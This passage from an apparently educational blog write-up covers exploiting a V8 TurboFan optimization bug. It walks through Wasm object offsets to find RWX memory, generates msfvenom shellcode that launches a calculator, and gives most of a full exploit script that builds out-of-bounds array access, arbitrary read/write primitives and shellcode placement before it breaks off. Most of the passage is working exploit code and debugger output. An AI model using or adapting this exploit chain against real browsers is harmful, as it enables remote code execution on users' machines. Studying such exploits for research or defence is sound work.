WasmExportedFunctionData -&gt; WasmInstanceObject -&gt; JumpTableStart.</p></blockquote><ul><li><p>Starting from the JSFunction, get its SharedFunctionInfo (at offset 0x18)</p><p><img src="/2021/01/v8-turboFan/debugprint6.png" alt="img"></p></li><li><p>Then, from the SharedFunctionInfo, get its WasmExportedFunctionData (at offset 0x8)</p><p><img src="/2021/01/v8-turboFan/debugprint7.png" alt="img"></p></li><li><p>Next, from the WasmExportedFunctionData, get the WasmInstanceObject (at offset 0x10)</p><p><img 
src="/2021/01/v8-turboFan/debugprint8.png" alt="img"></p></li><li><p>Finally, from the WasmInstanceObject, get JumpTableStart (at offset 0xe8)</p><p><img src="/2021/01/v8-turboFan/debugprint9.png" alt="img"></p></li></ul></li><li><p>Inspecting the data at the JumpTableStart address shows that it holds a sequence of machine instructions. If we set a breakpoint there and call the Wasm JSFunction from JS, the breakpoint catches the control flow:</p><p><img src="/2021/01/v8-turboFan/debugprint10.png" alt="img"></p><p>Here is the JS code used for the test:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// wasm binary for the C++ code `void func() &#123;&#125;`</span></span><br><span class="line"><span class="keyword">let</span> wasmCode = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>([<span class="number">0</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">109</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">1</span>,<span class="number">96</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">3</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span 
class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">112</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">5</span>,</span><br><span class="line">    <span class="number">131</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">6</span>,<span class="number">129</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">7</span>,<span class="number">145</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">2</span>,</span><br><span class="line">    <span class="number">6</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">109</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">121</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">10</span>,<span class="number">136</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">1</span>,<span class="number">130</span>,<span class="number">128</span>,<span 
class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">11</span>]);</span><br><span class="line"><span class="keyword">let</span> m = <span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Instance</span>(<span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Module</span>(wasmCode),&#123;&#125;);</span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunction</span> = m.<span class="property">exports</span>.<span class="property">func</span>;</span><br><span class="line"><span class="comment">// Print the Wasm JSFunction address and use it to look up JumpTableStart</span></span><br><span class="line">%<span class="title class_">DebugPrint</span>(<span class="title class_">WasmJSFunction</span>);</span><br><span class="line"><span class="comment">// Then set a breakpoint on JumpTableStart in gdb</span></span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br><span class="line"><span class="comment">// Try calling the Wasm JSFunction</span></span><br><span class="line"><span class="title class_">WasmJSFunction</span>();</span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br></pre></td></tr></table></figure></li><li><p>The picture is now clear: using the arbitrary-read primitive built earlier, we read the fields of the Wasm JSFunction one step at a time and finally obtain the RWX memory address:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">prettyHex</span>(<span class="params">bigint</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">return</span> <span class="string">&quot;0x&quot;</span> + <span class="title class_">BigInt</span>.<span class="title function_">asUintN</span>(<span class="number">64</span>,bigint).<span class="title function_">toString</span>(<span class="number">16</span>).<span class="title function_">padStart</span>(<span class="number">16</span>, <span class="string">&#x27;0&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// C++ 代码 `void func() &#123;&#125;` 的 wasm 二进制代码</span></span><br><span class="line"><span class="keyword">var</span> wasmCode = <span 
class="keyword">new</span> <span class="title class_">Uint8Array</span>([<span class="number">0</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">109</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">1</span>,<span class="number">96</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">3</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">112</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">5</span>,</span><br><span class="line">    <span class="number">131</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">6</span>,<span class="number">129</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">7</span>,<span class="number">145</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">2</span>,</span><br><span class="line">   
 <span class="number">6</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">109</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">121</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">10</span>,<span class="number">136</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">1</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">11</span>]);</span><br><span class="line"><span class="keyword">var</span> m = <span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Instance</span>(<span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Module</span>(wasmCode),&#123;&#125;);</span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunction</span> = m.<span class="property">exports</span>.<span class="property">func</span>;</span><br><span class="line"><span class="comment">// Place WasmJSFunction in the same memory region as the oob_arr array</span></span><br><span class="line"><span class="comment">// A sentinel value 0x233333 is written next to it so that the WasmJSFunction address can be located</span></span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunctionObj</span> = &#123;<span class="attr">guard</span>: <span class="title class_">Int64ToFloat64</span>(<span class="number">0x233333</span>), <span class="attr">wasmAddr</span>: <span class="title 
class_">WasmJSFunction</span>&#125;;</span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunctionIndex</span> = -<span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x4000</span>; i++)</span><br><span class="line">&#123;   </span><br><span class="line">    <span class="comment">// Look for the sentinel value</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="title class_">Float64ToInt64</span>(oob_arr[i]) == <span class="number">0x233333</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title class_">WasmJSFunctionIndex</span> = i + <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Quick check that WasmJSFunctionAddr was found</span></span><br><span class="line"><span class="keyword">if</span>(<span class="title class_">WasmJSFunctionIndex</span> == -<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">throw</span> <span class="string">&quot;WasmJSFunctionAddr is not found!&quot;</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] find WasmJSFunctionAddr offset: &quot;</span> + <span class="title class_">WasmJSFunctionIndex</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Get the WasmJSFunction address (subtracting 1 clears the heap-object tag bit)</span></span><br><span class="line"><span class="title class_">WasmJSFunctionAddr</span> = <span class="title class_">Float64ToInt64</span>(oob_arr[<span class="title class_">WasmJSFunctionIndex</span>]) - <span 
class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find WasmJSFunction address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmJSFunctionAddr</span>));</span><br><span class="line"><span class="comment">// Get the SharedFunctionInfo address</span></span><br><span class="line"><span class="title class_">SharedFunctionInfoAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmJSFunctionAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x18</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find SharedFunctionInfoAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">SharedFunctionInfoAddr</span>));</span><br><span class="line"><span class="comment">// Get the WasmExportedFunctionData address</span></span><br><span class="line"><span class="title class_">WasmExportedFunctionDataAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">SharedFunctionInfoAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x8</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find WasmExportedFunctionDataAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmExportedFunctionDataAddr</span>));</span><br><span class="line"><span class="comment">// Get the WasmInstanceObject address</span></span><br><span class="line"><span class="title class_">WasmInstanceObjectAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title 
class_">WasmExportedFunctionDataAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x10</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find WasmInstanceObjectAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmInstanceObjectAddr</span>));</span><br><span class="line"><span class="comment">// Get the JumpTableStart address</span></span><br><span class="line"><span class="title class_">JumpTableStartAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmInstanceObjectAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0xe8</span>));</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find JumpTableStartAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">JumpTableStartAddr</span>));</span><br></pre></td></tr></table></figure><p>Note that reading <code>WasmExportedFunctionDataAddr</code> trips a bounds check in debug builds:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/code-stub-assembler.cc</span></span><br><span class="line"><span class="comment">// in CodeStubAssembler::FixedArrayBoundsCheck</span></span><br><span class="line"><span class="built_in">CSA_CHECK</span>(<span class="keyword">this</span>, <span class="built_in">UintPtrLessThan</span>(effective_index,</span><br><span class="line">                                  <span class="built_in">LoadAndUntagFixedArrayBaseLength</span>(array)));</span><br></pre></td></tr></table></figure><p>Comment out this check and rebuild to get past it.</p></li></ul><h4 id="d-shellcode">d. 
shellcode</h4><p>Finally, we only need to write the shellcode to that RWX address and call the Wasm JSFunction to execute it.</p><p>Use msfvenom to generate shellcode that meets the following requirements:</p><ul><li><p>The payload targets <code>linux x64</code></p></li><li><p>The output format is C</p></li><li><p>The command is <code>DISPLAY=:0 gnome-calculator</code></p></li></ul><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p linux/x64/exec CMD=<span class="string">&#x27;DISPLAY=:0 gnome-calculator&#x27;</span> -f c</span><br></pre></td></tr></table></figure><p>The output is:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Payload size: <span class="number">67</span> bytes</span><br><span class="line">Final size of c file: <span class="number">307</span> bytes</span><br><span class="line"><span class="type">unsigned</span> <span class="type">char</span> buf[] = </span><br><span class="line"><span class="string">&quot;\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53&quot;</span></span><br><span class="line"><span class="string">&quot;\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x1c\x00&quot;</span></span><br><span class="line"><span class="string">&quot;\x00\x00\x44\x49\x53\x50\x4c\x41\x59\x3d\x3a\x30\x20\x67\x6e&quot;</span></span><br><span class="line"><span class="string">&quot;\x6f\x6d\x65\x2d\x63\x61\x6c\x63\x75\x6c\x61\x74\x6f\x72\x00&quot;</span></span><br><span class="line"><span class="string">&quot;\x56\x57\x48\x89\xe6\x0f\x05&quot;</span>;</span><br></pre></td></tr></table></figure><h4 id="e-exploit">e. 
exploit</h4><ul><li><p>结合上面的内容，release 版本 v8 的 exp 如下：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span 
class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span 
class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">log</span>(<span class="params">msg</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(msg);</span><br><span class="line">    <span class="comment">// var elem = document.getElementById(&quot;#log&quot;);</span></span><br><span class="line">    <span class="comment">// elem.innerText += &#x27;[+] &#x27; + msg + &#x27;\n&#x27;;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- 64位整数 与 64位浮点数相互转换的原语 -- *******/</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> transformBuffer = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">8</span>);</span><br><span class="line"><span class="keyword">var</span> bigIntArray = <span class="keyword">new</span> <span class="title 
class_">BigInt64Array</span>(transformBuffer);</span><br><span class="line"><span class="keyword">var</span> floatArray = <span class="keyword">new</span> <span class="title class_">Float64Array</span>(transformBuffer);</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">Int64ToFloat64</span>(<span class="params">int</span>)</span><br><span class="line">&#123;</span><br><span class="line">    bigIntArray[<span class="number">0</span>] = <span class="title class_">BigInt</span>(int);</span><br><span class="line">    <span class="keyword">return</span> floatArray[<span class="number">0</span>];</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">Float64ToInt64</span>(<span class="params">float</span>)</span><br><span class="line">&#123;</span><br><span class="line">    floatArray[<span class="number">0</span>] = float;</span><br><span class="line">    <span class="keyword">return</span> bigIntArray[<span class="number">0</span>];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- 修改JSArray length 的操作 -- *******/</span></span><br><span class="line"><span class="keyword">var</span> oob_arr = [];</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    oob_arr = [<span class="number">1.0</span>, <span class="number">1.1</span>, <span class="number">1.2</span>, <span class="number">1.3</span>, <span class="number">1.4</span>, <span class="number">1.5</span>, <span class="number">1.6</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? 
<span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= <span class="number">9007199254740990</span>;</span><br><span class="line">    t *= <span class="number">2</span>;</span><br><span class="line">    t += <span class="number">2</span>;</span><br><span class="line">    oob_arr[t] = <span class="number">3.4766779039175022e-310</span>; <span class="comment">// 0x4000.f2smi</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 试着触发 turboFan，从而修改 JSArray 的 length</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x10000</span>; i++)</span><br><span class="line">    <span class="title function_">opt_me</span>(<span class="number">1</span>);</span><br><span class="line"><span class="comment">// 简单 checker</span></span><br><span class="line"><span class="keyword">if</span>(oob_arr[<span class="number">1023</span>] == <span class="literal">undefined</span>)</span><br><span class="line">    <span class="keyword">throw</span> <span class="string">&quot;OOB Fail!&quot;</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] oob_arr.length == &quot;</span> + oob_arr.<span class="property">length</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- 任意地址读写原语 -- *******/</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> array_buffer;</span><br><span class="line">array_buffer = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x233</span>);</span><br><span class="line">data_view = 
<span class="keyword">new</span> <span class="title class_">DataView</span>(array_buffer);</span><br><span class="line">backing_store_offset = -<span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Locate backing_store_offset</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x4000</span>; i++)</span><br><span class="line">&#123;   </span><br><span class="line">    <span class="comment">// smi(0x233) == 0x0000023300000000 (the byte length of array_buffer)</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="title class_">Float64ToInt64</span>(oob_arr[i]) == <span class="number">0x0000023300000000</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        backing_store_offset = i + <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Sanity check: make sure backing_store was actually found</span></span><br><span class="line"><span class="keyword">if</span>(backing_store_offset == -<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">throw</span> <span class="string">&quot;backing_store is not found!&quot;</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] find backing_store offset: &quot;</span> + backing_store_offset);</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">read_8bytes</span>(<span class="params">addr</span>)</span><br><span class="line">&#123;</span><br><span class="line">    oob_arr[backing_store_offset] = <span class="title class_">Int64ToFloat64</span>(addr);</span><br><span 
class="line">    <span class="keyword">return</span> data_view.<span class="title function_">getBigInt64</span>(<span class="number">0</span>, <span class="literal">true</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">write_8bytes</span>(<span class="params">addr, data</span>)</span><br><span class="line">&#123;</span><br><span class="line">    oob_arr[backing_store_offset] = <span class="title class_">Int64ToFloat64</span>(addr);</span><br><span class="line">    data_view.<span class="title function_">setBigInt64</span>(<span class="number">0</span>, <span class="title class_">BigInt</span>(data), <span class="literal">true</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- 布置 wasm 地址以及获取 RWX 内存地址 -- *******/</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">prettyHex</span>(<span class="params">bigint</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;0x&quot;</span> + <span class="title class_">BigInt</span>.<span class="title function_">asUintN</span>(<span class="number">64</span>,bigint).<span class="title function_">toString</span>(<span class="number">16</span>).<span class="title function_">padStart</span>(<span class="number">16</span>, <span class="string">&#x27;0&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// C++ 代码 `void func() &#123;&#125;` 的 wasm 二进制代码</span></span><br><span class="line"><span class="keyword">var</span> wasmCode = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>([<span class="number">0</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">109</span>,<span 
class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">1</span>,<span class="number">96</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">3</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">112</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">5</span>,</span><br><span class="line">    <span class="number">131</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">6</span>,<span class="number">129</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">7</span>,<span class="number">145</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">2</span>,</span><br><span class="line">    <span class="number">6</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">109</span>,<span class="number">111</span>,<span class="number">114</span>,<span 
class="number">121</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">10</span>,<span class="number">136</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">1</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">11</span>]);</span><br><span class="line"><span class="keyword">var</span> m = <span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Instance</span>(<span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Module</span>(wasmCode),&#123;&#125;);</span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunction</span> = m.<span class="property">exports</span>.<span class="property">func</span>;</span><br><span class="line"><span class="comment">// 将WasmJSFunction 布置到与 oob_arr 数组相同的内存段上</span></span><br><span class="line"><span class="comment">// 这里写入了一个哨兵值0x233333，用于查找 WasmJSFunction 地址</span></span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunctionObj</span> = &#123;<span class="attr">guard</span>: <span class="title class_">Int64ToFloat64</span>(<span class="number">0x233333</span>), <span class="attr">wasmAddr</span>: <span class="title class_">WasmJSFunction</span>&#125;;</span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunctionIndex</span> = -<span 
